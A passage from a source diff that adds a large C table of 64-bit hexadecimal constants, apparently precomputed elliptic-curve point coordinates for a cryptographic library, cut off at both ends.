UINT64_C(0x25846B66780443D6), ++ UINT64_C(0xCE3C15ED55C97647), UINT64_C(0x3DC22D490E3FEB0F), ++ UINT64_C(0x2065B7CBA7DF26E4), UINT64_C(0xC8B00AE8187CEA1F) }, ++ { UINT64_C(0x1A5284A0865DDED3), UINT64_C(0x293C164920C83DE2), ++ UINT64_C(0xAB178D26CCE851B3), UINT64_C(0x8E6DB10B404505FB), ++ UINT64_C(0xF6F57E7190C82033), UINT64_C(0x1D2A1C015977F16C) } }, ++ { { UINT64_C(0xA39C89317C8906A4), UINT64_C(0xB6E7ECDD9E821EE6), ++ UINT64_C(0x2ECF8340F0DF4FE6), UINT64_C(0xD42F7DC953C14965), ++ UINT64_C(0x1AFB51A3E3BA8285), UINT64_C(0x6C07C4040A3305D1) }, ++ { UINT64_C(0xDAB83288127FC1DA), UINT64_C(0xBC0A699B374C4B08), ++ UINT64_C(0x402A9BAB42EB20DD), UINT64_C(0xD7DD464F045A7A1C), ++ UINT64_C(0x5B3D0D6D36BEECC4), UINT64_C(0x475A3E756398A19D) } }, ++ }, ++ { ++ { { UINT64_C(0x31BDB48372876AE8), UINT64_C(0xE3325D98961ED1BF), ++ UINT64_C(0x18C042469B6FC64D), UINT64_C(0x0DCC15FA15786B8C), ++ UINT64_C(0x81ACDB068E63DA4A), UINT64_C(0xD3A4B643DADA70FB) }, ++ { UINT64_C(0x46361AFEDEA424EB), UINT64_C(0xDC2D2CAE89B92970), ++ UINT64_C(0xF389B61B615694E6), UINT64_C(0x7036DEF1872951D2), ++ UINT64_C(0x40FD3BDAD93BADC7), UINT64_C(0x45AB6321380A68D3) } }, ++ { { UINT64_C(0x23C1F74481A2703A), UINT64_C(0x1A5D075CB9859136), ++ UINT64_C(0xA4F82C9D5AFD1BFD), UINT64_C(0xA3D1E9A4F89D76FE), ++ UINT64_C(0x964F705075702F80), UINT64_C(0x182BF349F56C089D) }, ++ { UINT64_C(0xE205FA8FBE0DA6E1), UINT64_C(0x32905EB90A40F8F3), ++ UINT64_C(0x331A1004356D4395), UINT64_C(0x58B78901FDBBDFDE), ++ UINT64_C(0xA52A15979BA00E71), UINT64_C(0xE0092E1F55497A30) } }, ++ { { UINT64_C(0x5562A85670EE8F39), UINT64_C(0x86B0C11764E52A9C), ++ UINT64_C(0xC19F317409C75B8C), UINT64_C(0x21C7CC3124923F80), ++ UINT64_C(0xE63FE47F8F5B291E), UINT64_C(0x3D6D3C050DC08B05) }, ++ { UINT64_C(0x58AE455EEE0C39A1), UINT64_C(0x78BEA4310AD97942), ++ UINT64_C(0x42C7C97F3EE3989C), UINT64_C(0xC1B03AF5F38759AE), ++ UINT64_C(0x1A673C75BCF46899), UINT64_C(0x4831B7D38D508C7D) } }, ++ { { UINT64_C(0x76512D1BC552E354), UINT64_C(0x2B7EB6DF273020FD), ++ UINT64_C(0xD1C73AA8025A5F25), UINT64_C(0x2ABA19295CBD2A40), ++ UINT64_C(0xB53CADC3C88D61C6), UINT64_C(0x7E66A95E098290F3) }, ++ { UINT64_C(0x72800ECBAF4C5073), UINT64_C(0x81F2725E9DC63FAF), ++ UINT64_C(0x14BF92A7282BA9D1), UINT64_C(0x90629672BD5F1BB2), ++ UINT64_C(0x362F68EBA97C6C96), UINT64_C(0xB1D3BB8B7EA9D601) } }, ++ { { UINT64_C(0x73878F7FA9C94429), UINT64_C(0xB35C3BC8456CA6D8), ++ UINT64_C(0xD96F0B3CF721923A), UINT64_C(0x28D8F06CE6D44FA1), ++ UINT64_C(0x94EFDCDCD5CD671A), UINT64_C(0x0299AB933F97D481) }, ++ { UINT64_C(0xB7CED6EA2FD1D324), UINT64_C(0xBD6832087E932EC2), ++ UINT64_C(0x24ED31FBCB755A6E), UINT64_C(0xA636098EE48781D2), ++ UINT64_C(0x8687C63CF0A4F297), UINT64_C(0xBB52344007478526) } }, ++ { { UINT64_C(0x2E5F741934124B56), UINT64_C(0x1F223AE14B3F02CA), ++ UINT64_C(0x6345B427E8336C7E), UINT64_C(0x92123E16F5D0E3D0), ++ UINT64_C(0xDAF0D14D45E79F3A), UINT64_C(0x6ACA67656F3BD0C6) }, ++ { UINT64_C(0xF6169FAB403813F4), UINT64_C(0x31DC39C0334A4C59), ++ UINT64_C(0x74C46753D589866D), UINT64_C(0x5741511D984C6A5D), ++ UINT64_C(0xF263128797FED2D3), UINT64_C(0x5687CA1B11614886) } }, ++ { { UINT64_C(0x076D902A33836D4B), UINT64_C(0xEC6C5C4324AFB557), ++ UINT64_C(0xA0FE2D1CA0516A0F), UINT64_C(0x6FB8D73700D22ECC), ++ UINT64_C(0xF1DE9077DAF1D7B3), UINT64_C(0xE4695F77D4C0C1EB) }, ++ { UINT64_C(0x5F0FD8A8B4375573), UINT64_C(0x762383595E50944F), ++ UINT64_C(0x65EA2F28635CD76F), UINT64_C(0x0854776925FDE7B0), ++ UINT64_C(0xB2345A2E51944304), UINT64_C(0x86EFA2F7A16C980D) } }, ++ { { UINT64_C(0x4CCBE2D0BF4D1D63), UINT64_C(0x32E33401397366D5), ++ UINT64_C(0xC83AFDDE71BDA2CE), UINT64_C(0x8DACE2AC478ED9E6), ++ UINT64_C(0x3AC6A559763FDD9E), UINT64_C(0x0FFDB04CB398558F) }, ++ { UINT64_C(0x6C1B99B2AFB9D6B8), UINT64_C(0x572BA39C27F815DD), ++ UINT64_C(0x9DE73EE70DBCF842), UINT64_C(0x2A3ED58929267B88), ++ UINT64_C(0xD46A7FD315EBBBB3), UINT64_C(0xD1D01863E29400C7) } }, ++ { { UINT64_C(0x8FB101D1E1F89EC5), UINT64_C(0xB87A1F53F8508042), ++ UINT64_C(0x28C8DB240ED7BEEF), UINT64_C(0x3940F845ACE8660A), ++ UINT64_C(0x4EACB619C6D453FD), UINT64_C(0x2E044C982BAD6160) }, ++ { UINT64_C(0x8792854880B16C02), UINT64_C(0xF0D4BEB3C0A9EB64), ++ UINT64_C(0xD785B4AFC183C195), UINT64_C(0x23AAB0E65E6C46EA), ++ UINT64_C(0x30F7E104A930FECA), UINT64_C(0x6A1A7B8BD55C10FB) } }, ++ { { UINT64_C(0xDA74EAEBDBFED1AA), UINT64_C(0xC8A59223DF0B025C), ++ UINT64_C(0x7EF7DC85D5B627F7), UINT64_C(0x02A13AE1197D7624), ++ UINT64_C(0x119E9BE12F785A9B), UINT64_C(0xC0B7572F00D6B219) }, ++ { UINT64_C(0x9B1E51266D4CAF30), UINT64_C(0xA16A51170A840BD1), ++ UINT64_C(0x5BE17B910E9CCF43), UINT64_C(0x5BDBEDDD69CF2C9C), ++ UINT64_C(0x9FFBFBCF4CF4F289), UINT64_C(0xE1A621836C355CE9) } }, ++ { { UINT64_C(0x056199D9A7B2FCCF), UINT64_C(0x51F2E7B6CE1D784E), ++ UINT64_C(0xA1D09C47339E2FF0), UINT64_C(0xC8E64890B836D0A9), ++ UINT64_C(0x2F781DCBC0D07EBE), UINT64_C(0x5CF3C2AD3ACF934C) }, ++ { UINT64_C(0xE55DB190A17E26AE), UINT64_C(0xC9C61E1F91245513), ++ UINT64_C(0x83D7E6CF61998C15), UINT64_C(0x4DB33C85E41D38E3), ++ UINT64_C(0x74D5F91DC2FEE43D), UINT64_C(0x7EBBDB4536BBC826) } }, ++ { { UINT64_C(0xE20EC7E9CB655A9D), UINT64_C(0x4977EB925C47D421), ++ UINT64_C(0xA237E12C3B9D72FA), UINT64_C(0xCAAEDBC1CBF7B145), ++ UINT64_C(0x5200F5B23B77AAA3), UINT64_C(0x32EDED55BDBE5380) }, ++ { UINT64_C(0x74E38A40E7C9B80A), UINT64_C(0x3A3F0CF8AB6DE911), ++ UINT64_C(0x56DCDD7AAD16AAF0), UINT64_C(0x3D2924498E861D5E), ++ UINT64_C(0xD6C61878985733E2), UINT64_C(0x2401FE7D6AA6CD5B) } }, ++ { { UINT64_C(0xABB3DC75B42E3686), UINT64_C(0xAE712419B4C57E61), ++ UINT64_C(0x2C565F72B21B009B), UINT64_C(0xA5F1DA2E710C3699), ++ UINT64_C(0x771099A0A5EBA59A), UINT64_C(0x4DA88F4AC10017A0) }, ++ { UINT64_C(0x987FFFD31927B56D), UINT64_C(0xB98CB8ECC4E33478), ++ UINT64_C(0xB224A971C2248166), UINT64_C(0x5470F554DE1DC794), ++ UINT64_C(0xD747CC24E31FF983), UINT64_C(0xB91745E9B5B22DAE) } }, ++ { { UINT64_C(0x6CCBFED072F34420), UINT64_C(0x95045E4DA53039D2), ++ UINT64_C(0x3B6C11545A793944), UINT64_C(0xAA114145DDB6B799), ++ UINT64_C(0xABC15CA4252B7637), UINT64_C(0x5745A35BA5744634) }, ++ { UINT64_C(0x05DC6BDEDA596FC0), UINT64_C(0xCD52C18CA8020881), ++ UINT64_C(0x03FA9F47D296BAD0), UINT64_C(0xD8E2C1297268E139), ++ UINT64_C(0x58C1A98D9EC450B0), UINT64_C(0x909638DADE48B20D) } }, ++ { { UINT64_C(0x7AFC30D49B7F8311), UINT64_C(0x82A0042242368EA3), ++ UINT64_C(0xBFF951986F5F9865), UINT64_C(0x9B24F612FC0A070F), ++ UINT64_C(0x22C06CF2620F489D), UINT64_C(0x3C7ED052780F7DBB) }, ++ { UINT64_C(0xDB87AB1834DAFE9B), UINT64_C(0x20C03B409C4BBCA1), ++ UINT64_C(0x5D718CF059A42341), UINT64_C(0x9863170669E84538), ++ UINT64_C(0x5557192BD27D64E1), UINT64_C(0x08B4EC52DA822766) } }, ++ { { UINT64_C(0xB2D986F6D66C1A59), UINT64_C(0x927DEB1678E0E423), ++ UINT64_C(0x9E673CDE49C3DEDC), UINT64_C(0xFA362D84F7ECB6CF), ++ UINT64_C(0x078E5F401BA17340), UINT64_C(0x934CA5D11F4E489C) }, ++ { UINT64_C(0xC03C073164EEF493), UINT64_C(0x631A353BD7931A7E), ++ UINT64_C(0x8E7CC3BB65DD74F1), UINT64_C(0xD55864C5702676A5), ++ UINT64_C(0x6D306AC4439F04BD), UINT64_C(0x58544F672BAFED57) } }, ++ }, ++ { ++ { { UINT64_C(0xB083BA6AEC074AEA), UINT64_C(0x46FAC5EF7F0B505B), ++ UINT64_C(0x95367A21FC82DC03), UINT64_C(0x227BE26A9D3679D8), ++ UINT64_C(0xC70F6D6C7E9724C0), UINT64_C(0xCD68C757F9EBEC0F) }, ++ { UINT64_C(0x29DDE03E8FF321B2), UINT64_C(0xF84AD7BB031939DC), ++ UINT64_C(0xDAF590C90F602F4B), UINT64_C(0x17C5288849722BC4), ++ UINT64_C(0xA8DF99F0089B22B6), UINT64_C(0xC21BC5D4E59B9B90) } }, ++ { { UINT64_C(0x4936C6A08A31973F), UINT64_C(0x54D442FA83B8C205), ++ UINT64_C(0x03AEE8B45714F2C6), UINT64_C(0x139BD6923F5AC25A), ++ UINT64_C(0x6A2E42BAB5B33794), UINT64_C(0x50FA11643FF7BBA9) }, ++ { UINT64_C(0xB61D8643F7E2C099), UINT64_C(0x2366C993BD5C6637), ++ UINT64_C(0x62110E1472EB77FA), UINT64_C(0x3D5B96F13B99C635), ++ UINT64_C(0x956ECF64F674C9F2), UINT64_C(0xC56F7E51EF2BA250) } }, ++ { { UINT64_C(0x246FFCB6FF602C1B), UINT64_C(0x1E1A1D746E1258E0), ++ UINT64_C(0xB4B43AE2250E6676), UINT64_C(0x95C1B5F0924CE5FA), ++ UINT64_C(0x2555795BEBD8C776), UINT64_C(0x4C1E03DCACD9D9D0) }, ++ { UINT64_C(0xE1D74AA69CE90C61), UINT64_C(0xA88C0769A9C4B9F9), ++ UINT64_C(0xDF74DF2795AF56DE), UINT64_C(0x24B10C5FB331B6F4), ++ UINT64_C(0xB0A6DF9A6559E137), UINT64_C(0x6ACC1B8FC06637F2) } }, ++ { { UINT64_C(0xBD8C086834B4E381), UINT64_C(0x278CACC730DFF271), ++ UINT64_C(0x87ED12DE02459389), UINT64_C(0x3F7D98FFDEF840B6), ++ UINT64_C(0x71EEE0CB5F0B56E1), UINT64_C(0x462B5C9BD8D9BE87) }, ++ { UINT64_C(0xE6B50B5A98094C0F), UINT64_C(0x26F3B274508C67CE), ++ UINT64_C(0x418B1BD17CB1F992), UINT64_C(0x607818ED4FF11827), ++ UINT64_C(0xE630D93A9B042C63), UINT64_C(0x38B9EFF38C779AE3) } }, ++ { { UINT64_C(0xE8767D36729C5431), UINT64_C(0xA8BD07C0BB94642C), ++ UINT64_C(0x0C11FC8E58F2E5B2), UINT64_C(0xD8912D48547533FE), ++ UINT64_C(0xAAE14F5E230D91FB), UINT64_C(0xC122051A676DFBA0) }, ++ { UINT64_C(0x9ED4501F5EA93078), UINT64_C(0x2758515CBD4BEE0A), ++ UINT64_C(0x97733C6C94D21F52), UINT64_C(0x139BCD6D4AD306A2), ++ UINT64_C(0x0AAECBDC298123CC), UINT64_C(0x102B8A311CB7C7C9) } }, ++ { { UINT64_C(0x22A28E59FAF46675), UINT64_C(0x1075730810A31E7D), ++ UINT64_C(0xC7EEAC842B4C2F4F), UINT64_C(0xBA370148B5EF5184), ++ UINT64_C(0x4A5A28668732E055), UINT64_C(0x14B8DCDCB887C36F) }, ++ { UINT64_C(0xDBA8C85C433F093D), UINT64_C(0x73DF549D1C9A201C), ++ UINT64_C(0x69AA0D7B70F927D8), UINT64_C(0xFA3A8685D7D2493A), ++ UINT64_C(0x6F48A2550A7F4013), UINT64_C(0xD20C8BF9DD393067) } }, ++ { { UINT64_C(0x4EC874EA81625E78), UINT64_C(0x8B8D8B5A3FBE9267), ++ UINT64_C(0xA3D9D1649421EC2F), UINT64_C(0x490E92D9880EA295), ++ UINT64_C(0x745D1EDCD8F3B6DA), UINT64_C(0x0116628B8F18BA03) }, ++ { UINT64_C(0x0FF6BCE0834EADCE), UINT64_C(0x464697F2000827F7), ++ UINT64_C(0x08DCCF84498D724E), UINT64_C(0x7896D3651E88304C), ++ UINT64_C(0xE63EBCCE135E3622), UINT64_C(0xFB942E8EDC007521) } }, ++ { { UINT64_C(0xBB155A66A3688621), UINT64_C(0xED2FD7CDF91B52A3), ++ UINT64_C(0x52798F5DEA20CB88), UINT64_C(0x069CE105373F7DD8), ++ UINT64_C(0xF9392EC78CA78F6B), UINT64_C(0xB3013E256B335169) }, ++ { UINT64_C(0x1D92F8006B11715C), UINT64_C(0xADD4050EFF9DC464), ++ UINT64_C(0x2AC226598465B84A), UINT64_C(0x2729D646465B2BD6), ++ UINT64_C(0x6202344AE4EFF9DD), UINT64_C(0x51F3198FCD9B90B9) } }, ++ { { UINT64_C(0x17CE54EFE5F0AE1D), UINT64_C(0x984E8204B09852AF), ++ UINT64_C(0x3365B37AC4B27A71), UINT64_C(0x720E3152A00E0A9C), ++ UINT64_C(0x3692F70D925BD606), UINT64_C(0xBE6E699D7BC7E9AB) }, ++ { UINT64_C(0xD75C041F4C89A3C0), UINT64_C(0x8B9F592D8DC100C0), ++ UINT64_C(0x30750F3AAD228F71), UINT64_C(0x1B9ECF84E8B17A11), ++ UINT64_C(0xDF2025620FBFA8A2), UINT64_C(0x45C811FCAA1B6D67) } }, ++ { { UINT64_C(0xEC5B84B71A5151F8), UINT64_C(0x118E59E8550AB2D2), ++ UINT64_C(0x2CCDEDA4049BD735), UINT64_C(0xC99CBA719CD62F0F), ++ UINT64_C(0x69B8040A62C9E4F8), UINT64_C(0x16F1A31A110B8283) }, ++ { UINT64_C(0x53F6380298E908A3), UINT64_C(0x308CB6EFD862F9DE), ++ UINT64_C(0xE185DAD8A521A95A), UINT64_C(0x4D8FE9A4097F75CA), ++ UINT64_C(0xD1ECCEC71CA07D53), UINT64_C(0x13DFA1DC0DB07E83) } }, ++ { { UINT64_C(0xDDAF9DC60F591A76), UINT64_C(0xE1A6D7CC1685F412), ++ UINT64_C(0x153DE557002B6E8D), UINT64_C(0x730C38BCC6DA37D9), ++ UINT64_C(0xAE1806220914B597), UINT64_C(0x84F98103DD8C3A0A) }, ++ { UINT64_C(0x369C53988DA205B0), UINT64_C(0xA3D95B813888A720), ++ UINT64_C(0x1F3F8BBFE10E2806), UINT64_C(0x48663DF54530D1F3), ++ UINT64_C(0x320523B43E377713), UINT64_C(0xE8B1A575C7894814) } }, ++ { { UINT64_C(0x330668712EE8EA07), UINT64_C(0xC6FB4EC560DA199D), ++ UINT64_C(0x33231860F4370A05), UINT64_C(0x7ABECE72C6DE4E26), ++ UINT64_C(0xDE8D4BD8EBDECE7A), UINT64_C(0xC90EE6571CBE93C7) }, ++ { UINT64_C(0x0246751B85AC2509), UINT64_C(0xD0EF142C30380245), ++ UINT64_C(0x086DF9C47C76E39C), UINT64_C(0x68F1304FB789FB56), ++ UINT64_C(0x23E4CB98A5E4BD56), UINT64_C(0x69A4C63C64663DCA) } }, ++ { { UINT64_C(0x6C72B6AF7CB34E63), UINT64_C(0x073C40CD6DFC23FE), ++ UINT64_C(0xBDEEE7A1C936693A), UINT64_C(0xBC858E806EFAD378), ++ UINT64_C(0xEAD719FFF5BE55D4), UINT64_C(0xC8C3238F04552F5F) }, ++ { UINT64_C(0x0952C068928D5784), UINT64_C(0x89DFDF2294C58F2B), ++ UINT64_C(0x332DEDF367502C50), UINT64_C(0x3ED2FA3AAC0BE258), ++ UINT64_C(0xAEDC9B8A7C5C8244), UINT64_C(0x43A761B9DC0EA34F) } }, ++ { { UINT64_C(0x8FD683A2CC5E21A5), UINT64_C(0x5F444C6EFBA2BB68), ++ UINT64_C(0x709ACD0EAF05586D), UINT64_C(0x8EFA54D2DE8FB348), ++ UINT64_C(0x35276B7134CFE29E), UINT64_C(0x77A06FCD941EAC8C) }, ++ { UINT64_C(0x5815792D928322DD), UINT64_C(0x82FF356B67F7CB59), ++ UINT64_C(0x71E40A78304980F4), UINT64_C(0xC8645C273667D021), ++ UINT64_C(0xE785741CAEBAE28F), UINT64_C(0xB2C1BC7553ECAC37) } }, ++ { { UINT64_C(0x633EB24F1D0A74DB), UINT64_C(0xF1F55E56FA752512), ++ UINT64_C(0x75FECA688EFE11DE), UINT64_C(0xC80FD91CE6BF19EC), ++ UINT64_C(0xAD0BAFEC2A14C908), UINT64_C(0x4E1C4ACAADE4031F) }, ++ { UINT64_C(0x463A815B1EB1549A), UINT64_C(0x5AD4253C668F1298), ++ UINT64_C(0x5CB3866238A37151), UINT64_C(0x34BB1CCFAFF16B96), ++ UINT64_C(0xDCA93B13EE731AB0), UINT64_C(0x9F3CE5CC9BE01A0B) } }, ++ { { UINT64_C(0x75DB5723A110D331), UINT64_C(0x67C66F6A7123D89F), ++ UINT64_C(0x27ABBD4B4009D570), UINT64_C(0xACDA6F84C73451BC), ++ UINT64_C(0xE4B9A23905575ACF), UINT64_C(0x3C2DB7EFAB2D3D6C) }, ++ { UINT64_C(0x01CCDD0829115145), UINT64_C(0x9E0602FE57B5814A), ++ UINT64_C(0x679B35C287862838), UINT64_C(0x0277DC4C38AD598D), ++ UINT64_C(0xEF80A2136D896DD4), UINT64_C(0xC8812213E7B9047B) } }, ++ }, ++ { ++ { { UINT64_C(0xAC6DBDF6EDC9CE62), UINT64_C(0xA58F5B440F9C006E), ++ UINT64_C(0x16694DE3DC28E1B0), UINT64_C(0x2D039CF2A6647711), ++ UINT64_C(0xA13BBE6FC5B08B4B), UINT64_C(0xE44DA93010EBD8CE) }, ++ { UINT64_C(0xCD47208719649A16), UINT64_C(0xE18F4E44683E5DF1), ++ UINT64_C(0xB3F66303929BFA28), UINT64_C(0x7C378E43818249BF), ++ UINT64_C(0x76068C80847F7CD9), UINT64_C(0xEE3DB6D1987EBA16) } }, ++ { { UINT64_C(0xCBBD8576C42A2F52), UINT64_C(0x9ACC6F709D2B06BB), ++ UINT64_C(0xE5CB56202E6B72A4), UINT64_C(0x5738EA0E7C024443), ++ UINT64_C(0x8ED06170B55368F3), UINT64_C(0xE54C99BB1AEED44F) }, ++ { UINT64_C(0x3D90A6B2E2E0D8B2), UINT64_C(0x21718977CF7B2856), ++ UINT64_C(0x089093DCC5612AEC), UINT64_C(0xC272EF6F99C1BACC), ++ UINT64_C(0x47DB3B43DC43EAAD), UINT64_C(0x730F30E40832D891) } }, ++ { { UINT64_C(0x9FFE55630C7FECDB), UINT64_C(0x55CC67B6F88101E5), ++ UINT64_C(0x3039F981CBEFA3C7), UINT64_C(0x2AB06883667BFD64), ++ UINT64_C(0x9007A2574340E3DF), UINT64_C(0x1AC3F3FA5A3A49CA) }, ++ { UINT64_C(0x9C7BE629C97E20FD), UINT64_C(0xF61823D3A3DAE003), ++ UINT64_C(0xFFE7FF39E7380DBA), UINT64_C(0x620BB9B59FACC3B8), ++ UINT64_C(0x2DDCB8CD31AE422C), UINT64_C(0x1DE3BCFAD12C3C43) } }, ++ { { UINT64_C(0x8C074946D6E0F9A9), UINT64_C(0x662FA99551C3B05B), ++ UINT64_C(0x6CDAE96904BB2048), UINT64_C(0x6DEC9594D6DC8B60), ++ UINT64_C(0x8D26586954438BBC), UINT64_C(0x88E983E31B0E95A5) }, ++ { UINT64_C(0x8189F11460CBF838), UINT64_C(0x77190697771DC46B), ++ UINT64_C(0x775775A227F8EC1A), UINT64_C(0x7A125240607E3739), ++ UINT64_C(0xAFAE84E74F793E4E), UINT64_C(0x44FA17F35BF5BAF4) } }, ++ { { UINT64_C(0xA21E69A5D03AC439), UINT64_C(0x2069C5FC88AA8094), ++ UINT64_C(0xB041EEA78C08F206), UINT64_C(0x55B9D4613D65B8ED), ++ UINT64_C(0x951EA25CD392C7C4), UINT64_C(0x4B9A1CEC9D166232) }, ++ { UINT64_C(0xC184FCD8FCF931A4), UINT64_C(0xBA59AD44063AD374), ++ UINT64_C(0x1868AD2A1AA9796F), UINT64_C(0x38A34018DFF29832), ++ UINT64_C(0x01FC880103DF8070), UINT64_C(0x1282CCE048DD334A) } }, ++ { { UINT64_C(0x76AA955726D8503C), UINT64_C(0xBE962B636BC3E3D0), ++ UINT64_C(0xF5CA93E597DE8841), UINT64_C(0x1561B05EAF3F2C16), ++ UINT64_C(0x34BE00AAD34BFF98), UINT64_C(0xEA21E6E9D23D2925) }, ++ { UINT64_C(0x55713230394C3AFB), UINT64_C(0xEAF0529BD6C8BECA), ++ UINT64_C(0xFF38A743202B9A11), UINT64_C(0xA13E39FC6D3A398B), ++ UINT64_C(0x8CBD644B86E2615A), UINT64_C(0x92063988191057EC) } }, ++ { { UINT64_C(0x787835CE13F89146), UINT64_C(0x7FCD42CC69446C3F), ++ UINT64_C(0x0DA2AA98840E679D), UINT64_C(0x44F2052318779A1B), ++ UINT64_C(0xE3A3B34FEFBF5935), UINT64_C(0xA5D2CFD0B9947B70) }, ++ { UINT64_C(0xAE2AF4EF27F4E16F), UINT64_C(0xA7FA70D2B9D21322), ++ UINT64_C(0x68084919B3FD566B), UINT64_C(0xF04D71C8D7AAD6AB), ++ UINT64_C(0xDBEA21E410BC4260), UINT64_C(0xAA7DC6658D949B42) } }, ++ { { UINT64_C(0xD8E958A06CCB8213), UINT64_C(0x118D9DB991900B54), ++ UINT64_C(0x09BB9D4985E8CED6), UINT64_C(0x410E9FB524019281), ++ UINT64_C(0x3B31B4E16D74C86E), UINT64_C(0x52BC0252020BB77D) }, ++ { UINT64_C(0x5616A26F27092CE4), UINT64_C(0x67774DBCA08F65CD), ++ UINT64_C(0x560AD494C08BD569), UINT64_C(0xBE26DA36AD498783), ++ UINT64_C(0x0276C8AB7F019C91), UINT64_C(0x09843ADA5248266E) } }, ++ { { UINT64_C(0xA0AE88A77D963CF2), UINT64_C(0x91EF8986D0E84920), ++ UINT64_C(0xC7EFE344F8C58104), UINT64_C(0x0A25D9FDECA20773), ++ UINT64_C(0x9D989FAA00D8F1D5), UINT64_C(0x4204C8CEC8B06264) }, ++ { UINT64_C(0x717C12E0BE1A2796), UINT64_C(0x1FA4BA8CC190C728), ++ UINT64_C(0xA245CA8D8C8A59BA), UINT64_C(0xE3C374757672B935), ++ UINT64_C(0x083D5E402E4D6375), UINT64_C(0x0B8D5AB35455E16E) } }, ++ { { UINT64_C(0x1DB17DBFEED765D4), UINT64_C(0xBBC9B1BEA5DDB965), ++ UINT64_C(0x1948F76DDFC12ABC), UINT64_C(0x2C2714E5134EF489), ++ UINT64_C(0x60CE2EE8741C600F), UINT64_C(0x32396F22F80E6E63) }, ++ { UINT64_C(0x421DAC7522537F59), UINT64_C(0x58FB73C649475DF5), ++ UINT64_C(0x0ABF28856F18F1C7), UINT64_C(0x364744689A398D16), ++ UINT64_C(0x87A661A7BF673B87), UINT64_C(0x3E80698F73819E17) } }, ++ { { UINT64_C(0xDFE4979353784CC4), UINT64_C(0x4280EAB0486D508F), ++ UINT64_C(0x119593FFE534F5A4), UINT64_C(0x98AEFADD9F63242F), ++ UINT64_C(0x9AE6A24AC4829CAE), UINT64_C(0xF2373CA558E8BA80) }, ++ { UINT64_C(0x4017AF7E51765FB3), UINT64_C(0xD1E40F7CAF4AEC4B), ++ UINT64_C(0x87372C7A0898E3BC), UINT64_C(0x688982B285452CA9), ++ UINT64_C(0x71E0B4BFB1E50BCA), UINT64_C(0x21FD2DBFF70E714A) } }, ++ { { UINT64_C(0xEE6E8820FB78DDAC), UINT64_C(0x0BAED29C063892CD), ++ UINT64_C(0x5F33049C28C0588D), UINT64_C(0x90C2515E18DBC432), ++ UINT64_C(0xB8A1B1433B4CB0BD), UINT64_C(0x0AB5C0C968103043) }, ++ { UINT64_C(0xF3788FA04005EC40), UINT64_C(0x82571C99039EE115), ++ UINT64_C(0xEE8FCED593260BED), UINT64_C(0x5A9BAF7910836D18), ++ UINT64_C(0x7C258B09C46AA4F6), UINT64_C(0x46ECC5E837F53D31) } }, ++ { { UINT64_C(0xFA32C0DCBFE0DD98), UINT64_C(0x66EFAFC4962B1066), ++ UINT64_C(0xBA81D33E64BDF5EB), UINT64_C(0x36C28536FC7FC512), ++ UINT64_C(0x0C95176BE0B4FA97), UINT64_C(0x47DDE29B3B9BC64A) }, ++ { UINT64_C(0x08D986FD5C173B36), UINT64_C(0x46D84B526CF3F28C), ++ UINT64_C(0x6F6ED6C3F026BDB9), UINT64_C(0xAC90668B68206DC5), ++ UINT64_C(0xE8ED5D98ECBE4E70), UINT64_C(0xCFFF61DDDC1A6974) } }, ++ { { UINT64_C(0xFF5C3A2977B1A5C1), UINT64_C(0x10C27E4A0DDF995D), ++ UINT64_C(0xCB745F77E23363E3), UINT64_C(0xD765DF6F32F399A3), ++ UINT64_C(0xF0CA0C2F8A99E109), UINT64_C(0xC3A6BFB71E025CA0) }, ++ { UINT64_C(0x830B2C0A4F9D9FA5), UINT64_C(0xAE914CACBD1A84E5), ++ UINT64_C(0x30B35ED8A4FEBCC1), UINT64_C(0xCB902B4684CFBF2E), ++ UINT64_C(0x0BD4762825FC6375), UINT64_C(0xA858A53C85509D04) } }, ++ { { UINT64_C(0x8B995D0C552E0A3F), UINT64_C(0xEDBD4E9417BE9FF7), ++ UINT64_C(0x3432E83995085178), UINT64_C(0x0FE5C18180C256F5), ++ UINT64_C(0x05A64EA8EBF9597C), UINT64_C(0x6ED44BB13F80371F) }, ++ { UINT64_C(0x6A29A05EFE4C12EE), UINT64_C(0x3E436A43E0BB83B3), ++ UINT64_C(0x38365D9A74D72921), UINT64_C(0x3F5EE823C38E1ED7), ++ UINT64_C(0x09A53213E8FA063F), UINT64_C(0x1E7FE47AB435E713) } }, ++ { { UINT64_C(0xE4D9BC94FDDD17F3), UINT64_C(0xC74B8FEDC1016C20), ++ UINT64_C(0x095DE39BB49C060E), UINT64_C(0xDBCC67958AC0DF00), ++ UINT64_C(0x4CF6BAEB1C34F4DF), UINT64_C(0x72C55C21E8390170) }, ++ { UINT64_C(0x4F17BFD2F6C48E79), UINT64_C(0x18BF4DA0017A80BA), ++ UINT64_C(0xCF51D829BCF4B138), UINT64_C(0x598AEE5FF48F8B0D), ++ UINT64_C(0x83FAEE5620F10809), UINT64_C(0x4615D4DC779F0850) } }, ++ }, ++ { ++ { { UINT64_C(0x22313DEE5852B59B), UINT64_C(0x6F56C8E8B6A0B37F), ++ UINT64_C(0x43D6EEAEA76EC380), UINT64_C(0xA16551360275AD36), ++ UINT64_C(0xE5C1B65ADF095BDA), UINT64_C(0xBD1FFA8D367C44B0) }, ++ { UINT64_C(0xE2B419C26B48AF2B), UINT64_C(0x57BBBD973DA194C8), ++ UINT64_C(0xB5FBE51FA2BAFF05), UINT64_C(0xA0594D706269B5D0), ++ UINT64_C(0x0B07B70523E8D667), UINT64_C(0xAE1976B563E016E7) } }, ++ { { UINT64_C(0x2FDE4893FBECAAAE), UINT64_C(0x444346DE30332229), ++ UINT64_C(0x157B8A5B09456ED5), UINT64_C(0x73606A7925797C6C), ++ UINT64_C(0xA9D0F47C33C14C06), UINT64_C(0x7BC8962CFAF971CA) }, ++ { UINT64_C(0x6E763C5165909DFD), UINT64_C(0x1BBBE41B14A9BF42), ++ UINT64_C(0xD95B7ECBC49E9EFC), UINT64_C(0x0C317927B38F2B59), ++ UINT64_C(0x97912B53B3C397DB), UINT64_C(0xCB3879AA45C7ABC7) } }, ++ { { UINT64_C(0xCD81BDCF24359B81), UINT64_C(0x6FD326E2DB4C321C), ++ UINT64_C(0x4CB0228BF8EBE39C), UINT64_C(0x496A9DCEB2CDD852), ++ UINT64_C(0x0F115A1AD0E9B3AF), UINT64_C(0xAA08BF36D8EEEF8A) }, ++ { UINT64_C(0x5232A51506E5E739), UINT64_C(0x21FAE9D58407A551), ++ UINT64_C(0x289D18B08994B4E8), UINT64_C(0xB4E346A809097A52), ++ UINT64_C(0xC641510F324621D0), UINT64_C(0xC567FD4A95A41AB8) } }, ++ { { UINT64_C(0x261578C7D57C8DE9), UINT64_C(0xB9BC491F3836C5C8), ++ UINT64_C(0x993266B414C8038F), UINT64_C(0xBACAD755FAA7CC39), ++ UINT64_C(0x418C4DEFD69B7E27), 